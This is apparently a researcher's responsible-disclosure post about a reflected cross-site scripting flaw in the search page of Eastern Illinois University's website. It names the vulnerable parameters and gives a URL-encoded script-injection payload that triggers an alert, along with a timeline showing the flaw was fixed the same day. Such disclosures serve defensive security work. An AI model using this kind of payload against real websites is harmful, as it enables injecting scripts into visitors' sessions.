Eastern Illinois University - Cross-Site Scripting Vulnerability

Eastern Illinois University - Cross-Site Scripting Vulnerability

Vulnerability : Cross-Site Scripting (XSS) - Reflected

Domain : https://www.eiu.edu

Vulnerable URL 1 : https://www.eiu.edu/search/?q=
Vulnerable Parameter : q

Vulnerable Parameter : type

XSS Payload (Encoded) : %22%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E

Timeline :
Apr 29,2020 - Report Sent
Apr 29,2020 - Vulnerability Fixed
Apr 29,2020 - Thanks received

Environment :
OS : Windows 10 Enterprise
Browser : Firefox
Version : 75.0 ( 64-bit )

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :

0 Comments